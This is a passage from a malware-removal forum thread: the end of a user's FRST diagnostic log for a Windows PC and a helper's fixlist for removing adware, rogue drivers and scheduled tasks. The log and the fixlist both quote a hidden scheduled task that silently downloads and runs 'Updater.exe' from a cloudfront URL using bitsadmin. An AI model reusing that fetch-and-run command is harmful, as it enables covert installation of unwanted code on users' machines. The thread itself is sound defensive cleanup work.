Realtek Ethernet Network Card Diagnostic tool for Windows Vista (HKLM\...\{1FECF5F8-8E75-432C-9FF7-1C04F1956B54}) (Version: 1.00 - Realtek)
Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version:  - )
Revo Uninstaller 1.95 (HKLM\...\Revo Uninstaller) (Version: 1.95 - VS Revo Group)
Roxio Activation Module (HKLM\...\{07159635-9DFE-4105-BFC0-2817DB540C68}) (Version: 1.0 - Roxio)
Roxio Creator Audio (HKLM\...\{83FFCFC7-88C6-41C6-8752-958A45325C82}) (Version: 3.5.0 - Roxio)
Roxio Creator BDAV Plugin (HKLM\...\{880AF49C-34F7-4285-A8AD-8F7A3D1C33DC}) (Version: 3.5.0 - Roxio)
Roxio Creator Copy (HKLM\...\{619CDD8A-14B6-43A1-AB6C-0F4EE48CE048}) (Version: 3.5.0 - Roxio)
Roxio Creator Data (HKLM\...\{0D397393-9B50-4C52-84D5-77E344289F87}) (Version: 3.5.0 - Roxio)
Roxio Creator DE (HKLM\...\{C8B0680B-CDAE-4809-9F91-387B6DE00F7C}) (Version: 3.5.0 - Roxio)
Roxio Creator Tools (HKLM\...\{0394CDC8-FABD-4ED8-B104-03393876DFDF}) (Version: 3.5.0 - Roxio)
Roxio Express Labeler 3 (HKLM\...\{6675CA7F-E51B-4F6A-99D4-F8F0124C6EAA}) (Version: 3.2.1 - Roxio)
Roxio Update Manager (HKLM\...\{30465B6C-B53F-49A1-9EBA-A3F187AD502E}) (Version: 6.0.0 - Roxio)
Samsung New PC Studio (HKLM\...\InstallShield_{F193FC0E-9E18-40FC-A974-509A1BDD240A}) (Version: 1.00.0000 - Samsung Electronics Co., Ltd.)
Samsung New PC Studio (Version: 1.00.0000 - Samsung Electronics Co., Ltd.) Hidden
SAMSUNG USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.3.650.0 - SAMSUNG Electronics Co., Ltd.)
SkinsHP1 (Version: 43.1.5.000 - Hewlett-Packard) Hidden
Sonic CinePlayer Decoder Pack (HKLM\...\{8D337F77-BE7F-41A2-A7CB-D5A63FD7049B}) (Version: 4.2.0 - Sonic Solutions)
Spybot - Search & Destroy (HKLM\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.4.40 - Safer-Networking Ltd.)
Steam (HKLM\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
TBS WMP Plug-in (HKLM\...\InstallShield_{13515135-48BB-4184-8C1F-2FAE0138E200}) (Version: 1.00.676 - CNN)
TBS WMP Plug-in (Version: 1.00.676 - CNN) Hidden
The Witcher: Enhanced Edition (HKLM\...\Steam App 20900) (Version:  - CD Projekt RED)
TrayApp (Version: 43.1.5.000 - Hewlett-Packard) Hidden
Unity Web Player (HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\...\UnityWebPlayer) (Version:  - Unity Technologies ApS)
Unload (Version: 4.0.0 - Hewlett-Packard) Hidden
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
VC 9.0 Runtime (Version: 1.0.0 - Check Point Software Technologies Ltd) Hidden
VLC media player 1.0.1 (HKLM\...\VLC media player) (Version: 1.0.1 - VideoLAN Team)
WebReg (Version: 43.1.5.000 - Hewlett-Packard) Hidden
Windows Live Essentials (HKLM\...\WinLiveSuite_Wave3) (Version: 14.0.8050.1202 - Microsoft Corporation)
Windows Live Sync (HKLM\...\{FDD810CA-D5E3-40E9-AB7B-36440B0D41EF}) (Version: 14.0.8050.1202 - Microsoft Corporation)
Windows Live Upload Tool (HKLM\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
Windows Media Player Firefox Plugin (HKLM\...\{69FDFBB6-351D-4B8C-89D8-867DC9D0A2A4}) (Version: 1.0.0.8 - Microsoft Corp)
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-1464855766-1936325176-3098395914-1000_Classes\CLSID\{38AB6A6C-CC4C-4f9e-A3DD-3C5681EF18A1}\InprocServer32 -> C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\extensions\{38AB6A6C-CC4C-4 (the data entry has 48 more characters).
CustomCLSID: HKU\S-1-5-21-1464855766-1936325176-3098395914-1000_Classes\CLSID\{3EC350A7-5C5E-4192-B734-E13722E10914}\InprocServer32 -> C:\Program Files\HP\HP Software Update\HPRulesEngine.dll (Hewlett-Packard Company)
CustomCLSID: HKU\S-1-5-21-1464855766-1936325176-3098395914-1000_Classes\CLSID\{444785F1-DE89-4295-863A-D46C3A781394}\InprocServer32 -> C:\Users\Angel\AppData\LocalLow\Unity\WebPlayer\loader\UnityWebPluginAX.ocx (Unity Technologies ApS)
 
==================== Restore Points  =========================
 
23-03-2015 11:44:32 Scheduled Checkpoint
26-03-2015 10:04:41 Windows Update
30-03-2015 12:03:45 Windows Update
02-04-2015 14:13:17 Windows Update
02-04-2015 18:17:48 Restore Operation
02-04-2015 18:53:53 Windows Update
02-04-2015 19:35:07 Windows Update
06-04-2015 12:53:05 Windows Update
08-04-2015 12:51:35 Scheduled Checkpoint
10-04-2015 16:46:36 Windows Update
11-04-2015 22:42:05 Removed iTunes
11-04-2015 22:46:02 Removed Bonjour
11-04-2015 22:49:56 Installed iTunes
12-04-2015 17:59:00 Windows Modules Installer
13-04-2015 13:03:15 Scheduled Checkpoint
13-04-2015 14:20:32 Revo Uninstaller's restore point - Coupon Printer for Windows
13-04-2015 14:22:36 Revo Uninstaller's restore point - Reimage Repair
13-04-2015 14:25:16 Revo Uninstaller's restore point - Shopping Helper Smartbar
13-04-2015 14:27:26 Revo Uninstaller's restore point - Shopping Helper Smartbar
13-04-2015 14:28:08 Revo Uninstaller's restore point - Shopping Helper Smartbar Engine
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2006-11-02 05:23 - 2015-04-12 20:17 - 00451469 ____R C:\Windows\system32\Drivers\etc\hosts
127.0.0.1 localhost
127.0.0.1 www.007guard.com
127.0.0.1 007guard.com
127.0.0.1 008i.com
127.0.0.1 www.008k.com
127.0.0.1 008k.com
127.0.0.1 www.00hq.com
127.0.0.1 00hq.com
127.0.0.1 010402.com
127.0.0.1 www.032439.com
127.0.0.1 032439.com
127.0.0.1 www.0scan.com
127.0.0.1 0scan.com
127.0.0.1 1000gratisproben.com
127.0.0.1 www.1000gratisproben.com
127.0.0.1 www.1001namen.com
127.0.0.1 1001namen.com
127.0.0.1 www.100888290cs.com
127.0.0.1 100888290cs.com
127.0.0.1 www.100sexlinks.com
127.0.0.1 100sexlinks.com
127.0.0.1 www.10sek.com
127.0.0.1 10sek.com
127.0.0.1 www.1-2005-search.com
127.0.0.1 1-2005-search.com
127.0.0.1 123haustiereundmehr.com
127.0.0.1 www.123haustiereundmehr.com
127.0.0.1 www.123simsen.com
127.0.0.1 123simsen.com
 
There are 1000 more lines.
 
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {04D7FA9D-8045-4496-A910-855A2B4FDD46} - \ASP No Task File <==== ATTENTION
Task: {0C0ACF2A-85AA-457B-B56B-C0FF5A803C48} - \FF Watcher {3186DD48-9E2A-4523-9F9C-5CFCC3C3BC10} No Task File <==== ATTENTION
Task: {15B98890-7862-4EB6-9F04-C86AA4B30ED3} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {1756FC84-4B84-4489-A32A-89CF57DE0260} - System32\Tasks\amiupdaterExd => cmd.exe /c start /min bitsadmin /transfer amijob /download /priority high http://d17xr4aw9ok0me.cloudfront.net/Updater.exe "C:\Users\Angel\AppData\Local\Temp\amiupdater175.exe"
Task: {1E227E50-07C4-4479-ADCD-AF829E565408} - \Mext Guard FBE8818C-5B13-48C2-A93E-AD731167DBF2 No Task File <==== ATTENTION
Task: {2B5725B7-C8CD-4C44-A84A-2D3E3C842E53} - System32\Tasks\RtlNICDiagVistaStart => C:\Program Files\Realtek\RTNICDiag\RTNICDiag.exe [2008-08-19] (Realtek)
Task: {2C62F3F5-FBF2-4876-9A8D-8BE4F136FB64} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2015-03-13] (Piriform Ltd)
Task: {3BBA328E-4379-4529-B561-54BA6D774C55} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [2014-09-29] (Google Inc.)
Task: {3CAD3FE6-5704-4E5F-8796-36F6155E7BD5} - System32\Tasks\{597FAF1C-9F17-4FBC-917E-BDCD12142EB5} => pcalua.exe -a E:\setup.exe -d E:\
Task: {4E8CAF01-3DAC-4A8B-B283-511599629E2C} - \Idle~_~Crawler Runner No Task File <==== ATTENTION
Task: {6586E20B-2210-4C87-8DA3-941E7CCB4C11} - System32\Tasks\Scan the system (Spybot - Search & Destroy) => C:\Program Files\Spybot - Search &amp; Destroy 2\SDScan.exe
Task: {70A81FD7-F19C-48EF-B9A2-057CE879CF79} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2015-02-04] (Adobe Systems Incorporated)
Task: {7A14E8EA-A987-4687-AA80-8CC58A9C4624} - \RocketTab No Task File <==== ATTENTION
Task: {7CDC9FA6-084D-42D0-9D11-267A98778EF1} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [2014-09-29] (Google Inc.)
Task: {8B2810B7-292B-4C79-9C55-05F873DF7A5F} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-12-19] (Adobe Systems Incorporated)
Task: {A2A83717-5995-48CA-85DE-4FC74F3D8ED1} - \AmiUpdXp No Task File <==== ATTENTION
Task: {B0A2C3D0-4B3B-4591-B037-13F9DF6031F0} - \RocketTab Update Task No Task File <==== ATTENTION
Task: {BCE0938D-23E3-4454-B630-F48F50BACE78} - \PennyBee No Task File <==== ATTENTION
Task: {C243BE3D-4FDA-4B1E-8A6A-914D96BAD2C1} - \Groovorio Updater No Task File <==== ATTENTION
Task: {CDCCD7C6-13F9-4525-9576-9B26112FB9EA} - System32\Tasks\amiupdaterExi => C:\Users\Angel\AppData\Local\Temp\amiupdater175.exe <==== ATTENTION
Task: {E41555CC-B83C-4225-A5A1-3DA9A104ABC7} - System32\Tasks\Microsoft\Windows\Maintenance\Idle~_~Crawler Update => %LOCALAPPDATA%\Idle~_~Crawler\Idle~_~Crawler.exe <==== ATTENTION
Task: {ED5063D5-5DB8-447F-98FF-1F9CF2EBBDE0} - System32\Tasks\Check for updates (Spybot - Search & Destroy) => C:\Program Files\Spybot - Search &amp; Destroy 2\SDUpdate.exe
Task: {FAFBC4FC-F442-4283-B32F-F0F4D650782F} - System32\Tasks\Refresh immunization (Spybot - Search & Destroy) => C:\Program Files\Spybot - Search &amp; Destroy 2\SDImmunize.exe
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\Check for updates (Spybot - Search & Destroy).job => C:\Program Files\Spybot - Search & Destroy 2\SDUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\Refresh immunization (Spybot - Search & Destroy).job => C:\Program Files\Spybot - Search & Destroy 2\SDImmunize.exe
Task: C:\Windows\Tasks\RtlNICDiagVistaStart.job => C:\Program Files\Realtek\RTNICDiag\RTNICDiag.exe
Task: C:\Windows\Tasks\Scan the system (Spybot - Search & Destroy).job => C:\Program Files\Spybot - Search & Destroy 2\SDScan.exe
 
==================== Loaded Modules (whitelisted) ==============
 
2014-01-20 14:17 - 2014-01-20 14:17 - 00073544 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2015-01-20 23:35 - 2015-01-20 23:35 - 01044776 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2014-09-29 09:15 - 2014-05-13 12:04 - 00109400 _____ () C:\Program Files\Spybot - Search & Destroy 2\snlThirdParty150.bpl
2014-09-29 09:15 - 2014-05-13 12:04 - 00416600 _____ () C:\Program Files\Spybot - Search & Destroy 2\DEC150.bpl
2014-09-29 09:15 - 2014-05-13 12:04 - 00167768 _____ () C:\Program Files\Spybot - Search & Destroy 2\snlFileFormats150.bpl
2014-09-29 09:15 - 2012-08-23 10:38 - 00574840 _____ () C:\Program Files\Spybot - Search & Destroy 2\sqlite3.dll
2014-09-29 09:15 - 2012-04-03 17:06 - 00565640 _____ () C:\Program Files\Spybot - Search & Destroy 2\av\BDSmartDB.dll
2009-02-17 15:51 - 2002-07-04 10:38 - 00053248 _____ () C:\Program Files\ArcSoft\PhotoImpression 5\share\pihook.dll
2015-02-15 22:06 - 2015-02-15 22:06 - 02391040 _____ () C:\Program Files\Smgy0ntk1mjjizdb\mgi0nzk4mjziyjb.exe
2015-01-06 08:18 - 2015-01-06 08:18 - 00039192 _____ () C:\Program Files\CCleaner\branding.dll
2015-04-02 18:44 - 2015-03-30 16:07 - 09279304 _____ () C:\Program Files\Google\Chrome\Application\41.0.2272.118\pdf.dll
2015-04-02 18:44 - 2015-03-30 16:07 - 14974280 _____ () C:\Program Files\Google\Chrome\Application\41.0.2272.118\PepperFlash\pepflashplayer.dll
2013-07-11 03:07 - 2013-07-11 03:07 - 03391488 _____ () c:\windows\assembly\nativeimages1_v1.1.4322\mscorlib\1.0.5000.0__b77a5c561934e089_a87a9960\mscorlib.dll
2013-07-11 03:06 - 2013-07-11 03:06 - 03035136 _____ () c:\windows\assembly\nativeimages1_v1.1.4322\system.windows.forms\1.0.5000.0__b77a5c561934e089_6eec51ce\system.windows.forms.dll
2013-07-11 03:06 - 2013-07-11 03:06 - 01966080 _____ () c:\windows\assembly\nativeimages1_v1.1.4322\system\1.0.5000.0__b77a5c561934e089_3b70900d\system.dll
2013-07-11 03:07 - 2013-07-11 03:07 - 00843776 _____ () c:\windows\assembly\nativeimages1_v1.1.4322\system.drawing\1.0.5000.0__b03f5f7f11d50a3a_318f459e\system.drawing.dll
2013-07-11 03:06 - 2013-07-11 03:06 - 02088960 _____ () c:\windows\assembly\nativeimages1_v1.1.4322\system.xml\1.0.5000.0__b77a5c561934e089_c7963648\system.xml.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vsmon => ""="Service"
 
==================== EXE Association (whitelisted) ===============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Angel\AppData\Roaming\Microsoft\Windows Live Photo Gallery\Windows Live Photo Gallery Wallpaper.jpg
DNS Servers: 192.168.1.254
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(Currently there is no automatic fix for this section.)
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-1464855766-1936325176-3098395914-500 - Administrator - Disabled)
Angel (S-1-5-21-1464855766-1936325176-3098395914-1000 - Administrator - Enabled) => C:\Users\Angel
ASPNET (S-1-5-21-1464855766-1936325176-3098395914-1002 - Limited - Enabled)
Guest (S-1-5-21-1464855766-1936325176-3098395914-501 - Limited - Disabled)
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (04/13/2015 02:36:00 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (04/13/2015 02:28:08 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Volume Shadow Copy Service error: Unexpected error querying for the IVssWriterCallback interface.  hr = 0x80070005.
This is often caused by incorrect security settings in either the writer or requestor process.
 
 
Operation:
   Gathering Writer Data
 
Context:
   Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
   Writer Name: System Writer
   Writer Instance ID: {2da99d99-68f3-4ca8-9da1-7b7415608f08}
 
Error: (04/13/2015 02:27:26 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Volume Shadow Copy Service error: Unexpected error querying for the IVssWriterCallback interface.  hr = 0x80070005.
This is often caused by incorrect security settings in either the writer or requestor process.
 
 
Operation:
   Gathering Writer Data
 
Context:
   Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
   Writer Name: System Writer
   Writer Instance ID: {2da99d99-68f3-4ca8-9da1-7b7415608f08}
 
Error: (04/13/2015 02:25:15 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Volume Shadow Copy Service error: Unexpected error querying for the IVssWriterCallback interface.  hr = 0x80070005.
This is often caused by incorrect security settings in either the writer or requestor process.
 
 
Operation:
   Gathering Writer Data
 
Context:
   Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
   Writer Name: System Writer
   Writer Instance ID: {2da99d99-68f3-4ca8-9da1-7b7415608f08}
 
Error: (04/13/2015 02:22:36 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Volume Shadow Copy Service error: Unexpected error querying for the IVssWriterCallback interface.  hr = 0x80070005.
This is often caused by incorrect security settings in either the writer or requestor process.
 
 
Operation:
   Gathering Writer Data
 
Context:
   Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
   Writer Name: System Writer
   Writer Instance ID: {2da99d99-68f3-4ca8-9da1-7b7415608f08}
 
Error: (04/13/2015 02:20:32 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Volume Shadow Copy Service error: Unexpected error querying for the IVssWriterCallback interface.  hr = 0x80070005.
This is often caused by incorrect security settings in either the writer or requestor process.
 
 
Operation:
   Gathering Writer Data
 
Context:
   Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
   Writer Name: System Writer
   Writer Instance ID: {2da99d99-68f3-4ca8-9da1-7b7415608f08}
 
Error: (04/13/2015 11:12:23 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (04/12/2015 11:45:12 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (04/12/2015 08:55:02 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (04/12/2015 08:26:52 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
 
System errors:
=============
Error: (04/13/2015 02:38:47 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Windows Font Cache Service%%1053
 
Error: (04/13/2015 02:38:47 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: 30000Windows Font Cache Service
 
Error: (04/13/2015 02:34:51 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Windows Search2300001Restart the service
 
Error: (04/13/2015 02:34:33 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Windows Installer11200001Restart the service
 
Error: (04/13/2015 02:34:33 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Volume Shadow Copy1
 
Error: (04/13/2015 02:34:32 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: iPod Service1
 
Error: (04/13/2015 02:34:31 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Windows Search1300001Restart the service
 
Error: (04/13/2015 02:34:31 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Spybot-S&D 2 Security Center Service1600001Restart the service
 
Error: (04/13/2015 02:34:31 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Intel® Matrix Storage Event Monitor1
 
Error: (04/13/2015 02:34:31 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Spybot-S&D 2 Updating Service1600001Restart the service
 
 
Microsoft Office Sessions:
=========================
Error: (03/26/2014 06:52:30 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6690.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 8129 seconds with 3120 seconds of active time.  This session ended with a crash.
 
Error: (03/24/2014 07:49:14 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6690.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 17 seconds with 0 seconds of active time.  This session ended with a crash.
 
Error: (03/24/2014 07:48:48 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6690.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 2505 seconds with 1020 seconds of active time.  This session ended with a crash.
 
Error: (03/12/2014 09:18:57 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6690.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 14721 seconds with 6540 seconds of active time.  This session ended with a crash.
 
Error: (12/15/2013 07:23:08 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6683.5002, Microsoft Office Version: 12.0.6612.1000. This session lasted 19238 seconds with 3120 seconds of active time.  This session ended with a crash.
 
Error: (12/15/2013 02:02:18 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6683.5002, Microsoft Office Version: 12.0.6612.1000. This session lasted 284 seconds with 180 seconds of active time.  This session ended with a crash.
 
Error: (12/15/2013 01:56:07 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6683.5002, Microsoft Office Version: 12.0.6612.1000. This session lasted 9327 seconds with 2760 seconds of active time.  This session ended with a crash.
 
Error: (09/30/2013 08:41:20 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6683.5001, Microsoft Office Version: 12.0.6612.1000. This session lasted 49 seconds with 0 seconds of active time.  This session ended with a crash.
 
 
CodeIntegrity Errors:
===================================
  Date: 2015-04-13 15:11:13.087
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-04-13 15:11:12.669
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-04-13 15:11:12.247
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-04-13 15:11:11.218
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-04-13 15:11:10.654
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-04-13 15:11:10.368
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-04-13 15:11:09.784
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-04-13 15:11:09.405
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-04-13 15:10:27.403
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-04-13 15:10:27.023
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™2 Duo CPU E7300 @ 2.66GHz
Percentage of memory in use: 85%
Total physical RAM: 3036.26 MB
Available physical RAM: 447.16 MB
Total Pagefile: 6283.5 MB
Available Pagefile: 3481.06 MB
Total Virtual: 2047.88 MB
Available Virtual: 1914.67 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:288.04 GB) (Free:159.58 GB) NTFS ==>[Drive with boot components (obtained from BCD)]
Drive d: (RECOVERY) (Fixed) (Total:10 GB) (Free:4.79 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 298.1 GB) (Disk ID: 38000000)
Partition 1: (Not Active) - (Size=55 MB) - (Type=DE)
Partition 2: (Not Active) - (Size=10 GB) - (Type=07 NTFS)
Partition 3: (Active) - (Size=288 GB) - (Type=07 NTFS)
 
==================== End Of Log ============================
 
 
 
 
 
 


#4 deeprybka

deeprybka

  • Malware Response Team
  • 5,198 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:12:30 PM

Posted 14 April 2015 - 03:12 AM

Hi there,
 
Step 1

frst.pngfrstfix.png

Press thew7.png + R on your keyboard at the same time. Type notepad and click OK.
  • Copy the entire content of the codebox below and paste into the notepad document:
    CloseProcesses:
    HKLM\...\Run: [NPSStartup] => [X]
    HKLM\...\Run: [mgy0ntk1mjjizdb] => C:\Program Files\Smgy0ntk1mjjizdb\mgi0nzk4mjziyjb.exe [2391040 2015-02-15] ()
    C:\Program Files\Smgy0ntk1mjjizdb
    Winlogon\Notify\SDWinLogon: SDWinLogon.dll [X]
    GroupPolicy: Group Policy on Chrome detected <======= ATTENTION
    CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
    HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction 
    SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
    SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
    SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
    BHO: No Name -> {1FD79A59-37B1-459B-9097-09F9FAB8A523} ->  No File
    BHO: No Name -> {5C255C8A-E604-49b4-9D64-90988571CECB} ->  No File
    Toolbar: HKU\S-1-5-21-1464855766-1936325176-3098395914-1000 -> No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} -  No File
    R1 mgi0nzk4mjziyjb; C:\Windows\System32\drivers\mgi0nzk4mjziyjb.sys [56200 2015-02-15] (NetFilterSDK.com)
    C:\Windows\System32\drivers\mgi0nzk4mjziyjb.sys 
    2015-03-28 21:14 - 2015-03-28 21:14 - 00000000 ____D () C:\Users\Angel\AppData\Local\Setup642505
    2015-03-28 21:13 - 2015-03-28 21:14 - 00000000 ____D () C:\Users\Angel\AppData\Local\mota
    2015-03-22 23:13 - 2015-03-22 23:14 - 00000000 ____D () C:\Program Files\Smgy0ntk1mjjizdb(232)
    Task: {04D7FA9D-8045-4496-A910-855A2B4FDD46} - \ASP No Task File 
    Task: {0C0ACF2A-85AA-457B-B56B-C0FF5A803C48} - \FF Watcher {3186DD48-9E2A-4523-9F9C-5CFCC3C3BC10} No Task File 
    Task: {1756FC84-4B84-4489-A32A-89CF57DE0260} - System32\Tasks\amiupdaterExd => cmd.exe /c start /min bitsadmin /transfer amijob /download /priority high http://d17xr4aw9ok0me.cloudfront.net/Updater.exe 
    Task: {1E227E50-07C4-4479-ADCD-AF829E565408} - \Mext Guard FBE8818C-5B13-48C2-A93E-AD731167DBF2 No Task File 
    Task: {4E8CAF01-3DAC-4A8B-B283-511599629E2C} - \Idle~_~Crawler Runner No Task File 
